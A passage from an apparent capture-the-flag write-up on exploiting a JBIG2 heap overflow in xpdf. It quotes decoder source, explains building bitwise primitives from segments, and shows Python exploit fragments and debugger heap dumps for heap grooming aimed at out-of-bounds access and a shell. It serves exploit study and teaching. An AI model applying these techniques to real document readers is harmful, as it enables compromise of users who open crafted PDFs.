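Reading on, in 5 0 obj the /DecodeParms entry references the stream in 4 0 obj, that is, MyStream1. The parameter /Filter /JBIG2Decode specifies that the following stream, MyStream2, is decoded with JBIG2Decode.

So MyStream2 is decoded with JBIG2Decode, and its decode parameter is the referenced 4 0 obj, that is, MyStream1 after FlateDecode decoding. The key of that parameter is JBIG2Globals.

What we have to do is carefully construct MyStream1 and MyStream2 (both are JBIG2Streams) so that parsing them triggers the vulnerability and gets us a shell.

Once both streams are built, jbig2enc/pdf.py can be used to create the pdf.

2. A Brief Tour of Segments

Note: it is best to read the code of each segment in this section yourself.

When xpdf decodes a JBIG2Stream, JBIG2Decode needs the JBIG2Globals parameter, as shown in the previous section. So the JBIG2Globals stream is parsed first, and the main stream after it. The following code shows how the streams are parsed: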

void JBIG2Stream::reset()
{
    GList *t;

    segments = new GList();
    globalSegments = new GList();

    // read the globals stream
    if (globalsStream.isStream())
    {
        // Parse the global stream passed in via DecodeParms, i.e. FlateDecode(MyStream1)
        curStr = globalsStream.getStream();
        curStr->reset();
        // Parsing needs the decoders, so initialize them here
        arithDecoder->setStream(curStr);
        huffDecoder->setStream(curStr);
        mmrDecoder->setStream(curStr);
        // Start reading segments
        readSegments();
        curStr->close();
        // swap the newly read segments list into globalSegments
        t = segments;
        segments = globalSegments;
        globalSegments = t;
    }

    // read the main stream
    // Parse the main stream, i.e. MyStream2
    curStr = str;
    curStr->reset();
    // Initialize the decoders again
    arithDecoder->setStream(curStr);
    huffDecoder->setStream(curStr);
    mmrDecoder->setStream(curStr);
    readSegments();

    if (pageBitmap)
    {
        dataPtr = pageBitmap->getDataPtr();
        dataEnd = dataPtr + pageBitmap->getDataSize();
    }
    else
    {
        dataPtr = dataEnd = NULL;
    }
}

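From this we learn that a JBIG2Stream consists of multiple Segments, and there are many Segment types. We only look at the few that are actually used.

a. EOFSeg

Parsing this Segment marks the end of reading all segments. It has no other purpose.

b. SymbolDictSeg

A SymbolDict mainly holds an array of pointers to Bitmaps. A Bitmap can store data, and in the actual exploit it plays a role similar to memory.

The specification calls each Bitmap in a symbol dict an instance.

When a SymbolDictSeg is parsed, every Bitmap is read from the stream and created.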

GBool JBIG2Stream::readSymbolDictSeg(Guint segNum, Guint length,
                                     Guint *refSegs, Guint nRefSegs)
{
    [...]
    // Create the bitmaps array
    // get the input symbol bitmaps
    bitmaps = (JBIG2Bitmap **)gmallocn(numInputSyms + numNewSyms,
                                       sizeof(JBIG2Bitmap *));
    for (i = 0; i < numInputSyms + numNewSyms; ++i)
    {
        bitmaps[i] = NULL;
    }
    k = 0;
    inputSymbolDict = NULL;
    for (i = 0; i < nRefSegs; ++i)
    {
        if ((seg = findSegment(refSegs[i])))
        {
            if (seg->getType() == jbig2SegSymbolDict)
            {
                inputSymbolDict = (JBIG2SymbolDict *)seg;
                for (j = 0; j < inputSymbolDict->getSize(); ++j)
                {
                    bitmaps[k++] = inputSymbolDict->getBitmap(j);
                }
            }
        }
    }
    [...]
    // Start reading bitmaps from the external JBIG2Stream
    symHeight = 0;
    i = 0;
    while (i < numNewSyms)
    {
        // read the height class delta height
        if (huff) [...]
        else
        {
            arithDecoder->decodeInt(&dh, iadhStats);
        } 
        [...]
        symHeight += dh;
        symWidth = 0;
        totalWidth = 0;
        j = i;

        [...]

        // read the symbols in this height class
        while (1)
        {
            // read the delta width
            if (huff) [...]
            else
            {
                if (!arithDecoder->decodeInt(&dw, iadwStats))
                {
                    break;
                }
            }
            [...]

            // using a collective bitmap, so don't read a bitmap here
            if (huff && !refAgg) [...]
            else if (refAgg) [...]
            else
            {
                // Read a bitmap from the external stream and store it in the array
                bitmaps[numInputSyms + i] =
                    readGenericBitmap(gFalse, symWidth, symHeight,
                                    sdTemplate, gFalse, gFalse, NULL,
                                    sdATX, sdATY, 0);
            }

            ++i;
        }

        // read the collective bitmap
        if (huff && !refAgg) [...]
    }
    // Create a symbolDict object
    // create the symbol dict object
    symbolDict = new JBIG2SymbolDict(segNum, numExSyms);

    // Copy the bitmaps array created above into the symbolDict object
    // exported symbol list
    i = j = 0;
    ex = gFalse;
    prevRun = 1;
    while (i < numInputSyms + numNewSyms)
    {
        if (huff)
            [...]
        else
        {
            arithDecoder->decodeInt(&run, iaexStats);
        }
        [...]
        if (ex)
        {
            for (cnt = 0; cnt < run; ++cnt)
            {
                // Deep-copy the bitmaps created above into symbolDict
                symbolDict->setBitmap(j++, bitmaps[i++]->copy());
            }
        }
        else
        {
            i += run;
        }
        ex = !ex;
        prevRun = run;
    }
    [...] // Free the bitmaps array
    // store the new symbol dict
    segments->append(symbolDict);
    [...]
}

c. PageInfoSeg

Every Page needs a Bitmap that holds the data rendered for that page. When a PageInfoSeg is parsed, the program creates a stream-wide Bitmap: pageBitmap.

void JBIG2Stream::readPageInfoSeg(Guint length)
{
    Guint xRes, yRes, flags, striping;

    if (!readULong(&pageW) || !readULong(&pageH) ||
        !readULong(&xRes) || !readULong(&yRes) ||
        !readUByte(&flags) || !readUWord(&striping))
    {
        goto eofError;
    }
    [...]
    // Create the stream-wide field pageBitmap
    pageBitmap = new JBIG2Bitmap(0, pageW, curPageH);

    // default pixel value
    [...]

    return;

eofError:
    error(errSyntaxError, getPos(), "Unexpected EOF in JBIG2 stream");
}

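Note that pageBitmap is critical: it is the bitmap of a Page. We will use the heap overflow to overwrite the Width and Height of pageBitmap and thereby gain out-of-bounds read and write.

PageInfoSeg can also be used to bypass a sanity check, as described later.

d. GenericRegionSeg

Parsing a GenericRegionSeg reads a Bitmap from the stream and combines it with a specific region of the current pageBitmap:

Note that Segments in the JBIG2Globals stream are not allowed to reference any Segment, so a GenericRegionSeg cannot be placed in the JBIG2Globals stream.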

void JBIG2Stream::readGenericRegionSeg(Guint segNum, GBool imm,
                                       GBool lossless, Guint length)
{
    [...]
    // read the bitmap
    bitmap = readGenericBitmap(mmr, w, h, templ, tpgdOn, gFalse,
                               NULL, atx, aty, mmr ? length - 18 : 0);

    // combine the region bitmap into the page bitmap
    if (imm)
    {
        if (pageH == 0xffffffff && y + h > curPageH)
        {
            pageBitmap->expand(y + h, pageDefPixel);
        }
        pageBitmap->combine(bitmap, x, y, extCombOp);
        delete bitmap;

        // store the region bitmap
    }
    [...]
}

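Reading the Bitmap from the stream happens in readGenericBitmap, and the read requires a decoder.

The combination with pageBitmap is done mainly by JBIG2Bitmap::combine, which supports five operations: OR, AND, XOR, XNOR, and replace: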

switch (combOp)
{
    case 0: // or
        dest |= src1 & m2;
        break;
    case 1: // and
        dest &= src1 | m1;
        break;
    case 2: // xor
        dest ^= src1 & m2;
        break;
    case 3: // xnor
        dest ^= (src1 ^ 0xff) & m2;
        break;
    case 4: // replace
        dest = (src1 & m2) | (dest & m1);
        break;
}

By exploiting the parsing of this segment, we can feed external immediate values into pageBitmap, where they wait for further computation.
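To see what each of the five operators does to a byte, here is a small Python model of the switch statement above. It assumes, based on how the masks are used in the snippet, that m2 selects the bits being updated and m1 selects the bits being preserved (so the two are complementary); the function name and test values are my own.

```python
def combine_byte(comb_op, dest, src, m1, m2):
    """Model of one byte of JBIG2Bitmap::combine.
    m2: mask of bits to update, m1: mask of bits to keep (assumed complementary)."""
    if comb_op == 0:    # or
        dest |= src & m2
    elif comb_op == 1:  # and
        dest &= src | m1
    elif comb_op == 2:  # xor
        dest ^= src & m2
    elif comb_op == 3:  # xnor
        dest ^= (src ^ 0xFF) & m2
    elif comb_op == 4:  # replace
        dest = (src & m2) | (dest & m1)
    else:
        raise ValueError("unknown combination operator")
    return dest & 0xFF


dest, src = 0xAA, 0xCC   # 10101010 and 11001100
m1, m2 = 0x0F, 0xF0      # keep the low nibble, update the high nibble
results = [combine_byte(op, dest, src, m1, m2) for op in range(5)]
print([hex(r) for r in results])
```

In every case the low nibble of dest survives untouched, while the high nibble becomes the OR, AND, XOR, XNOR, or plain copy of the two inputs.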

e. GenericRefinementRegionSeg

When combined, the parsing steps of GenericRefinementRegionSeg allow bitwise operations on parts of the data in pageBitmap. We can use these bitwise operations to build an adder:

void JBIG2Stream::readGenericRefinementRegionSeg(Guint segNum, GBool imm,
                                                 GBool lossless, Guint length,
                                                 Guint *refSegs,
                                                 Guint nRefSegs)
{
    [...]
    if (nRefSegs == 1)
    {
        if (!(seg = findSegment(refSegs[0])) ||
            seg->getType() != jbig2SegBitmap)
        {
            error(errSyntaxError, getPos(),
                  "Bad bitmap reference in JBIG2 generic refinement segment");
            return;
        }
        refBitmap = (JBIG2Bitmap *)seg;
    }
    else
    {
        refBitmap = pageBitmap->getSlice(x, y, w, h);
    }
    [...]
    // read
    bitmap = readGenericRefinementRegion(w, h, templ, tpgrOn,
                                         refBitmap, 0, 0, atx, aty);

    // combine the region bitmap into the page bitmap
    if (imm)
    {
        pageBitmap->combine(bitmap, x, y, extCombOp);
        delete bitmap;

        // store the region bitmap
    }
    else
    {
        bitmap->setSegNum(segNum);
        segments->append(bitmap);
    }
    [...]
}

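When a GenericRefinementRegionSeg references no segment, nRefSegs is 0, and refBitmap is the block of pageBitmap selected by the given x, y, w, and h.
Since readGenericRefinementRegion is influenced only by refBitmap, we can treat the returned bitmap as equivalent to the data in that region of pageBitmap.
Next, if imm is false, this data, equivalent to a region of pageBitmap, is stored into the segments array.
If the next GenericRefinementRegionSeg references the segment created in the first step, refBitmap is the Bitmap created in that step. With imm set to true, that Bitmap is then combined with the specified position of pageBitmap, which is a bitwise operation.
Since the bitmap created in the first step comes from pageBitmap, the whole process is equivalent to:
- Take a block of data from position 1 of pageBitmap and save it into segments.
- Take that block from segments and apply a bitwise operation between it and position 2 of pageBitmap.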
+----------------------> x-axis
|
| .(2)
|
| .(1)
|
V
y-axis

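This achieves a bitwise operation between the data at two chosen positions of pageBitmap. We will use it to build bitwise primitives step by step, and eventually an adder.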
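For readers who have not built an adder out of logic gates before, the Python sketch below shows the principle with nothing but AND, OR, and XOR on single bits. It is a generic ripple-carry adder, not the circuit from the actual exploit, and all helper names are mine.

```python
def full_adder(a, b, carry):
    """One-bit full adder built only from AND, OR and XOR."""
    s = a ^ b ^ carry
    carry_out = (a & b) | (carry & (a ^ b))
    return s, carry_out


def add_bits(x_bits, y_bits):
    """Ripple-carry addition of two equal-length little-endian bit lists.
    The final carry is dropped, so the result wraps like a fixed-width register."""
    out, carry = [], 0
    for a, b in zip(x_bits, y_bits):
        s, carry = full_adder(a, b, carry)
        out.append(s)
    return out


def to_bits(n, width):
    return [(n >> i) & 1 for i in range(width)]


def from_bits(bits):
    return sum(b << i for i, b in enumerate(bits))


total = from_bits(add_bits(to_bits(0x1234, 16), to_bits(0x0FFF, 16)))
print(hex(total))
```

Each `^`, `&`, and `|` here corresponds to one combine operation between two positions of pageBitmap, so a 16-bit addition costs a fixed, predictable number of segments.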

f. TextRegionSeg

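A TextRegionSeg can reference a given SymbolDictSeg and operate on any instance in it.

Note that Segments in the JBIG2Globals stream are not allowed to reference any Segment, so a TextRegionSeg cannot be placed in the JBIG2Globals stream.

The overall flow is roughly as follows: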

void JBIG2Stream::readTextRegionSeg(Guint segNum, GBool imm,
                                    GBool lossless, Guint length,
                                    Guint *refSegs, Guint nRefSegs)
{
    [...]
    // get the symbol bitmaps
    // for every referenced segment, copy each instance into the syms array
    syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *));
    kk = 0;
    for (i = 0; i < nRefSegs; ++i)
    {
        if ((seg = findSegment(refSegs[i])))
        {
            if (seg->getType() == jbig2SegSymbolDict)
            {
                symbolDict = (JBIG2SymbolDict *)seg;
                for (k = 0; k < symbolDict->getSize(); ++k)
                {
                    syms[kk++] = symbolDict->getBitmap(k);
                }
            }
        }
    }
    [...]
    // run readTextRegion, which combines the selected syms into a newly created bitmap
    bitmap = readTextRegion(huff, refine, w, h, numInstances,
                            logStrips, numSyms, symCodeTab, symCodeLen, syms,
                            defPixel, combOp, transposed, refCorner, sOffset,
                            huffFSTable, huffDSTable, huffDTTable,
                            huffRDWTable, huffRDHTable,
                            huffRDXTable, huffRDYTable, huffRSizeTable,
                            templ, atx, aty);

    gfree(syms);

    // combine the region bitmap into the page bitmap
    // combine the current bitmap with pageBitmap, carrying the values of the referenced instances onto pageBitmap
    if (imm)
    {
        if (pageH == 0xffffffff && y + h > curPageH)
        {
            pageBitmap->expand(y + h, pageDefPixel);
        }
        pageBitmap->combine(bitmap, x, y, extCombOp);
        delete bitmap;

        // store the region bitmap
    }
    else
    {
        bitmap->setSegNum(segNum);
        segments->append(bitmap);
    }
    [...]
}

3. JBIG2Encode

a. encode Bitmap

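From the Segments source code above, it is easy to see that in bitmap-reading functions such as readGenericBitmap, hso tries to decode the incoming bitmap from the external JBIG2Stream with some decoder (for example, the many arithDecoder->decodeInt calls in the code).

Since we are the ones supplying that external JBIG2Stream, we have to apply the matching encoding to every bitmap we write into the pdf.

The JBIG2Stream::reset function at the very top shows that there are three decoders in total: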

JArithmeticDecoder
JBIG2HuffmanDecoder
JBIG2MMRDecoder

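Implementing the inner algorithms of these decoders by hand would make solving the challenge very slow. Instead, we can use the jbig2enc library to do the encoding for us. It already implements the encoding side of the JArithmeticDecoder state machine, so we can encode bitmaps without understanding the internals.

git clone git@github.com:agl/jbig2enc.git

However, the library is written in C++, and writing the whole exploit in C++ would be a lot of work. We can use pybind11 to expose part of the jbig2enc interface to python, so that the exploit itself can be written in python.

sudo apt-get install pybind11-dev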

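Finally, note that the jbig2enc interface uses a lot of pointers, and exposing pointers to python is a very poor choice (calling pointer-based interfaces from python slows development and raises the chance of hitting bugs). It is better to work from our actual requirement, namely:

Encode bitmap data in the form expected by JArithmeticDecoder.

and write an extra C++ wrapper that implements three encapsulated structs/enums:

ArithEncoder: the class that calls jbig2enc to encode a bitmap
Bitmap: the bitmap data to be encoded
ArithEncoder::Proc: the state enum of the ArithEncoder encoder

These three structs/enums are then exposed to python, so that python never touches pointers directly.

The code described in this subsection corresponds to the following files in the exp: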
hso-groupie/exploit/jbig2arith.[cc,h]
hso-groupie/exploit/jbjbarith.[cc,h]

b. encode segments

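When hso reads segments, it first reads a series of fields and flags for the current segment (segNum, segFlags, refFlags, and so on), and only then performs the (possible) bitmap read.

We have to place these fields and flags into the JBIG2Stream by hand as well. They do not go through a decoder, so we can simply write code that emits them into the stream one by one.

This step lives in hso-groupie/exploit/jbig2.py in the exp. The script implements, for every segment type we use, a conversion from a python structure to JBIG2Stream bytes. The bitmap encoder interface exposed to python in the previous subsection is also used in this script.

With this in place, once we have designed the specific segments in python, we can quickly convert them into JBIG2Stream data.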

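V. Exploitation Flow

1. Heap feng shui

a. Creating heap holes

First, the overview diagram:

To exploit this heap overflow, we need heap feng shui that places specific structures in specific chunks. The heap feng shui has to achieve the following goals:

- When the pdf parses the TextRegionSeg, the syms pointer array it creates must land at the "undersized syms buffer" position.
- The segment holding the JBIG2SymbolDict structure with a huge number of pointers must sit at the "segments GList backing buffer" position.
  Here we plan to store the JBIG2SymbolDict structures in the global segment, because a SymbolDictSegment does not depend on any other segment, whereas the later TextRegionSegment depends on these SymbolDictSegments.
- The pageBitmap structure must occupy the JBIG2Bitmap block in the diagram, and its data must occupy the "bitmap backing buffer" block above it.
  Reading through the code shows that most segments can combine their bitmap with pageBitmap during parsing and keep the result on pageBitmap. Giving pageBitmap an out-of-bounds read/write capability is therefore the best choice.

We start by allocating three SymbolDicts with different numbers of Bitmaps in the global segment. The different sizes exist so that the TextRegionSeg can later combine them to overflow the size; the positions of these three chunks do not matter: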

# global segment
global_file = [
    SymbolDict(0, [Bitmap(1, 1)] * 0x10000),
    SymbolDict(1, [Bitmap(1, 1)] * (size_to_overflow // 8)),
    SymbolDict(2, [Bitmap(1, 1)]),
]

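Here size_to_overflow is the number of overflowed bytes shown in the diagram above; how it is computed is explained later.

Let's look at the bins after these three SymbolDicts have been allocated. There are a large number of fragmented chunks: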

pwndbg> bins
tcachebins
0x20 [  4]: 0x55555579f8e0 —▸ 0x5555557b9550 —▸ 0x5555557b0c10 —▸ 0x5555557b0c60 ◂— 0x0
0x30 [  5]: 0x5555557ab330 —▸ 0x5555557b0c30 —▸ 0x5555557b0c80 —▸ 0x555555799280 —▸ 0x5555557992d0 ◂— 0x0
0x40 [  7]: 0x5555557f7f90 —▸ 0x5555557f8f10 —▸ 0x5555557f9100 —▸ 0x5555557f7bb0 —▸ 0x5555557fe710 —▸ 0x5555557a0320 —▸ 0x555555797210 ◂— 0x0
0x50 [  1]: 0x5555557a02b0 ◂— 0x0
0x60 [  4]: 0x5555557ab3c0 —▸ 0x5555557a9e40 —▸ 0x5555557ab890 —▸ 0x5555557ab790 ◂— 0x0
0x70 [  1]: 0x5555557ac760 ◂— 0x0
0x90 [  1]: 0x5555557b94c0 ◂— 0x0
0xa0 [  3]: 0x555555798e00 —▸ 0x5555557b6930 —▸ 0x5555557b6a10 ◂— 0x0
0xb0 [  2]: 0x5555557ba520 —▸ 0x5555557b9410 ◂— 0x0
0xc0 [  3]: 0x5555557bec00 —▸ 0x5555557bf620 —▸ 0x5555557b1220 ◂— 0x0
0xd0 [  5]: 0x555555799ec0 —▸ 0x5555557b0cb0 —▸ 0x5555557c5400 —▸ 0x5555557c37f0 —▸ 0x5555557bfcf0 ◂— 0x0
0xe0 [  3]: 0x5555557be4b0 —▸ 0x5555557a9a30 —▸ 0x5555557bc750 ◂— 0x0
0xf0 [  3]: 0x5555557c6d30 —▸ 0x5555557bd370 —▸ 0x5555557bd4a0 ◂— 0x0
0x100 [  2]: 0x5555557c4360 —▸ 0x5555557c44a0 ◂— 0x0
0x110 [  1]: 0x555555797100 ◂— 0x0
0x120 [  2]: 0x5555557c1000 —▸ 0x5555557c5880 ◂— 0x0
0x140 [  3]: 0x5555557c7c80 —▸ 0x5555557c7430 —▸ 0x5555557cc180 ◂— 0x0
0x150 [  3]: 0x5555557cdac0 —▸ 0x5555557c83f0 —▸ 0x5555557c8590 ◂— 0x0
0x160 [  2]: 0x55555579fc00 —▸ 0x5555557a4420 ◂— 0x0
0x170 [  3]: 0x555555797c20 —▸ 0x5555557d36c0 —▸ 0x5555557d3550 ◂— 0x0
0x180 [  2]: 0x5555557bff50 —▸ 0x5555557d8010 ◂— 0x0
0x190 [  7]: 0x5555557adb80 —▸ 0x5555557d8530 —▸ 0x5555557ad570 —▸ 0x5555557ac7d0 —▸ 0x5555557a8710 —▸ 0x5555557a8d60 —▸ 0x5555557aad00 ◂— 0x0
0x1a0 [  2]: 0x5555557d2890 —▸ 0x5555557ad700 ◂— 0x0
0x1b0 [  2]: 0x5555557a8ef0 —▸ 0x5555557aea50 ◂— 0x0
0x1c0 [  2]: 0x5555557d1bb0 —▸ 0x55555579ad70 ◂— 0x0
0x1d0 [  2]: 0x555555796b00 —▸ 0x555555796640 ◂— 0x0
0x1f0 [  2]: 0x5555557a6410 —▸ 0x5555557a6220 ◂— 0x0
0x200 [  2]: 0x55555576a670 —▸ 0x5555557aae90 ◂— 0x0
0x220 [  2]: 0x5555557d8310 —▸ 0x5555557ac960 ◂— 0x0
0x230 [  1]: 0x5555557bd980 ◂— 0x0
0x270 [  1]: 0x5555557ba6d0 ◂— 0x0
0x2b0 [  1]: 0x5555557abdc0 ◂— 0x0
0x2c0 [  1]: 0x555555798320 ◂— 0x0
0x2e0 [  1]: 0x5555557aa730 ◂— 0x0
0x300 [  2]: 0x5555557a5c60 —▸ 0x5555557a9590 ◂— 0x0
0x310 [  7]: 0x5555557ae510 —▸ 0x5555557ac110 —▸ 0x5555557ad010 —▸ 0x5555557abab0 —▸ 0x5555557a9280 —▸ 0x5555557aa420 —▸ 0x5555557a76c0 ◂— 0x0
0x320 [  3]: 0x555555799f90 —▸ 0x5555557becc0 —▸ 0x5555557bab30 ◂— 0x0
0x350 [  2]: 0x5555557bcb40 —▸ 0x5555557c3bd0 ◂— 0x0
0x390 [  1]: 0x5555557a88a0 ◂— 0x0
0x3b0 [  2]: 0x555555797250 —▸ 0x5555557a79d0 ◂— 0x0
0x3c0 [  1]: 0x5555557d39d0 ◂— 0x0
0x3d0 [  1]: 0x5555557cccc0 ◂— 0x0
0x400 [  1]: 0x55555576aa50 ◂— 0x0
0x410 [  3]: 0x555555797810 —▸ 0x5555557bf1d0 —▸ 0x5555557a7f90 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x5555558304b0 —▸ 0x7ffff7ad8c00 (main_arena+96) ◂— 0x5555558304b0
smallbins
0x20: 0x5555557a99e0 —▸ 0x7ffff7ad8c10 (main_arena+112) ◂— 0x5555557a99e0
0xb0: 0x5555557f82f0 —▸ 0x7ffff7ad8ca0 (main_arena+256) ◂— 0x5555557f82f0
0xf0: 0x5555557d0ab0 —▸ 0x7ffff7ad8ce0 (main_arena+320) ◂— 0x5555557d0ab0
0x120: 0x5555557992f0 —▸ 0x7ffff7ad8d10 (main_arena+368) ◂— 0x5555557992f0
0x190: 0x5555557f7df0 —▸ 0x5555557f8d70 —▸ 0x5555557f8f60 —▸ 0x5555557f7a10 —▸ 0x5555557fe570 ◂— ...
0x1c0 [corrupted]
FD: 0x5555557f1a30 —▸ 0x5555557f4780 —▸ 0x5555557d15f0 —▸ 0x5555557e49d0 —▸ 0x55555579ecf0 ◂— ...
BK: 0x5555557d0c90 —▸ 0x5555557d06f0 —▸ 0x5555557d1410 —▸ 0x5555557d0e70 —▸ 0x55555579e390 ◂— ...
0x1d0 [corrupted]
FD: 0x5555557f9910 —▸ 0x5555557f9720 —▸ 0x5555557f85b0 —▸ 0x5555557fe960 —▸ 0x5555557f66b0 ◂— ...
BK: 0x5555557f9530 —▸ 0x5555557f9150 —▸ 0x5555557fb050 —▸ 0x5555557fdd90 —▸ 0x5555557fd1e0 ◂— ...
0x1e0 [corrupted]
FD: 0x5555557a13c0 —▸ 0x5555557a0bc0 —▸ 0x5555557a11c0 —▸ 0x5555557a0570 —▸ 0x5555557a0770 ◂— ...
BK: 0x5555557fcbf0 —▸ 0x5555557fc9f0 —▸ 0x5555557fdb90 —▸ 0x5555557fe760 —▸ 0x5555557fc210 ◂— ...
0x1f0: 0x5555557ba930 —▸ 0x5555557f1120 —▸ 0x5555557d19b0 —▸ 0x5555557befd0 —▸ 0x7ffff7ad8de0 (main_arena+576) ◂— ...
0x200: 0x5555557a9b00 —▸ 0x5555557df570 —▸ 0x5555557a8500 —▸ 0x7ffff7ad8df0 (main_arena+592) ◂— 0x5555557a9b00
0x220 [corrupted]
FD: 0x5555557f3c20 —▸ 0x5555557ecce0 —▸ 0x5555557e8180 —▸ 0x5555557f57f0 —▸ 0x5555557ee5a0 ◂— ...
BK: 0x5555557f4540 —▸ 0x5555557f2130 —▸ 0x5555557f27e0 —▸ 0x5555557eec60 —▸ 0x5555557f2ea0 ◂— ...
0x230 [corrupted]
FD: 0x5555557ae810 —▸ 0x5555557f49d0 —▸ 0x5555557e2710 —▸ 0x5555557f4c20 —▸ 0x5555557a0970 ◂— ...
BK: 0x5555557f0a20 —▸ 0x5555557a23a0 —▸ 0x5555557e5a20 —▸ 0x5555557a3d20 —▸ 0x5555557a3f70 ◂— ...
0x240 [corrupted]
FD: 0x5555557f5590 —▸ 0x5555557f1330 —▸ 0x5555557e3730 —▸ 0x5555557f4e70 —▸ 0x5555557a1ef0 ◂— ...
BK: 0x5555557ec840 —▸ 0x5555557f50d0 —▸ 0x5555557a4660 —▸ 0x5555557e4090 —▸ 0x5555557f5330 ◂— ...
0x250: 0x55555579a760 —▸ 0x7ffff7ad8e40 (main_arena+672) ◂— 0x55555579a760
0x270 [corrupted]
FD: 0x5555557dd3a0 —▸ 0x5555557e1a10 —▸ 0x5555557e0810 —▸ 0x5555557e02e0 —▸ 0x5555557e0aa0 ◂— ...
BK: 0x5555557a54a0 —▸ 0x5555557a5210 —▸ 0x5555557e1f40 —▸ 0x5555557e0aa0 —▸ 0x5555557e02e0 ◂— ...
0x280 [corrupted]
FD: 0x5555557c7560 —▸ 0x5555557b0d70 —▸ 0x5555557e0570 —▸ 0x5555557df2d0 —▸ 0x5555557df810 ◂— ...
BK: 0x5555557e21d0 —▸ 0x5555557deaf0 —▸ 0x5555557df030 —▸ 0x5555557e2470 —▸ 0x5555557ded90 ◂— ...
0x290: 0x5555557acb70 —▸ 0x5555557ddb10 —▸ 0x5555557e0030 —▸ 0x5555557e1760 —▸ 0x5555557de5a0 ◂— ...
0x2a0: 0x5555557dfd70 —▸ 0x5555557dfab0 —▸ 0x7ffff7ad8e90 (main_arena+752) ◂— 0x5555557dfd70
0x2c0: 0x5555557a5f50 —▸ 0x5555557f5c90 —▸ 0x7ffff7ad8eb0 (main_arena+784) ◂— 0x5555557a5f50 /* 'P_zUUU' */
0x340: 0x5555557f5f70 —▸ 0x5555557ac410 —▸ 0x7ffff7ad8f30 (main_arena+912) ◂— 0x5555557f5f70
0x380: 0x5555557c69a0 —▸ 0x7ffff7ad8f70 (main_arena+976) ◂— 0x5555557c69a0
0x390: 0x5555557d7c70 —▸ 0x7ffff7ad8f80 (main_arena+992) ◂— 0x5555557d7c70 /* 'p|}UUU' */
0x3b0: 0x5555557c54c0 —▸ 0x7ffff7ad8fa0 (main_arena+1024) ◂— 0x5555557c54c0
0x3f0: 0x5555557bd580 —▸ 0x7ffff7ad8fe0 (main_arena+1088) ◂— 0x5555557bd580
largebins
0x580: 0x5555557cc2b0 —▸ 0x555555797d80 —▸ 0x7ffff7ad9050 (main_arena+1200) ◂— 0x5555557cc2b0
0x600: 0x5555557c7db0 —▸ 0x7ffff7ad9070 (main_arena+1232) ◂— 0x5555557c7db0
0x640: 0x5555557be580 —▸ 0x7ffff7ad9080 (main_arena+1248) ◂— 0x5555557be580
0x780: 0x5555557ea9f0 —▸ 0x5555557cb9e0 —▸ 0x7ffff7ad90d0 (main_arena+1328) ◂— 0x5555557ea9f0
0x800: 0x5555557985d0 —▸ 0x7ffff7ad90f0 (main_arena+1360) ◂— 0x5555557985d0
0x840: 0x5555557cdc00 —▸ 0x7ffff7ad9100 (main_arena+1376) ◂— 0x5555557cdc00
0x900: 0x5555557bdba0 —▸ 0x7ffff7ad9130 (main_arena+1424) ◂— 0x5555557bdba0
0x940: 0x5555557e77f0 —▸ 0x5555557e9b00 —▸ 0x7ffff7ad9140 (main_arena+1440) ◂— 0x5555557e77f0
0x980: 0x5555557d86b0 —▸ 0x5555557ebea0 —▸ 0x7ffff7ad9150 (main_arena+1456) ◂— 0x5555557d86b0
0x9c0: 0x555555795c40 —▸ 0x7ffff7ad9160 (main_arena+1472) ◂— 0x555555795c40 /* '@\\yUUU' */
0xa00: 0x5555557cd080 —▸ 0x7ffff7ad9170 (main_arena+1488) ◂— 0x5555557cd080
0xa40: 0x555555799440 —▸ 0x5555557d1e40 —▸ 0x7ffff7ad9180 (main_arena+1504) ◂— 0x555555799440
0xac0: 0x5555557e83c0 —▸ 0x5555557e6100 —▸ 0x7ffff7ad91a0 (main_arena+1536) ◂— 0x5555557e83c0
0xb00: 0x5555557d2a20 —▸ 0x7ffff7ad91b0 (main_arena+1552) ◂— 0x5555557d2a20 /* ' *}UUU' */
0xb40: 0x5555557e6c70 —▸ 0x5555557feb50 —▸ 0x7ffff7ad91c0 (main_arena+1568) ◂— 0x5555557e6c70 /* 'pl~UUU' */
0xc40: 0x5555557eb210 —▸ 0x5555557e8ea0 —▸ 0x7ffff7ad9200 (main_arena+1632) ◂— 0x5555557eb210
0xe00: 0x5555557c00c0 —▸ 0x5555557b9630 —▸ 0x5555557c4590 —▸ 0x7ffff7ad9210 (main_arena+1648) ◂— 0x5555557c00c0
0x1400: 0x5555557b5420 —▸ 0x7ffff7ad9240 (main_arena+1696) ◂— 0x5555557b5420 /* ' T{UUU' */
0x1600: 0x5555557ce770 —▸ 0x7ffff7ad9250 (main_arena+1712) ◂— 0x5555557ce770
0x1800: 0x5555557bae40 —▸ 0x7ffff7ad9260 (main_arena+1728) ◂— 0x5555557bae40
0x2600: 0x5555557b6aa0 —▸ 0x5555557c1110 —▸ 0x7ffff7ad92d0 (main_arena+1840) ◂— 0x5555557b6aa0
0x2a00: 0x55555579af20 —▸ 0x7ffff7ad92f0 (main_arena+1872) ◂— 0x55555579af20
0x3000: 0x5555557d3d80 —▸ 0x5555557d9b60 —▸ 0x5555557c88a0 —▸ 0x7ffff7ad9300 (main_arena+1888) ◂— 0x5555557d3d80

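These fragmented chunks would seriously disturb the heap feng shui that follows, so they all need to be allocated away. PageInfoSeg is used for this, because reading the code shows that JBIG2Stream::readPageInfoSeg has no effect other than allocating one chunk: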

def DummyAlloc(size):
    return PageInfo(233, w=8, h=size)

global_file = [
    SymbolDict(0, [Bitmap(1, 1)] * 0x10000),
    SymbolDict(1, [Bitmap(1, 1)] * (size_to_overflow // 8)),
    SymbolDict(2, [Bitmap(1, 1)]),
    # Heap grooming: eat every chunk in {tcache,fast,small,large,unsorted} bins
    [[DummyAlloc(size)] * 128 for size in range(0x10, 0x1000, 0x10)],
    [[DummyAlloc(size)] * 16 for size in range(0x1000, 0x10000, 0x100)],
]

The bins after these allocations look like this, and are much cleaner:

pwndbg> bins
tcachebins
empty
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0x20 [corrupted]
FD: 0x55555579d9f0 —▸ 0x5555557d2860 —▸ 0x555555798db0 —▸ 0x5555557d7fe0 —▸ 0x5555557d7c30 ◂— ...
BK: 0x5555557f96e0 —▸ 0x5555557f9300 —▸ 0x5555557fb200 —▸ 0x5555557fdf40 —▸ 0x5555557fd390 ◂— ...
largebins
empty

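The next question is how to design the heap feng shui. The exploit gives a clear answer:

Use the grow-when-full behavior of the global segment GList to create heap holes, then let other structures occupy those holes to complete the heap feng shui.

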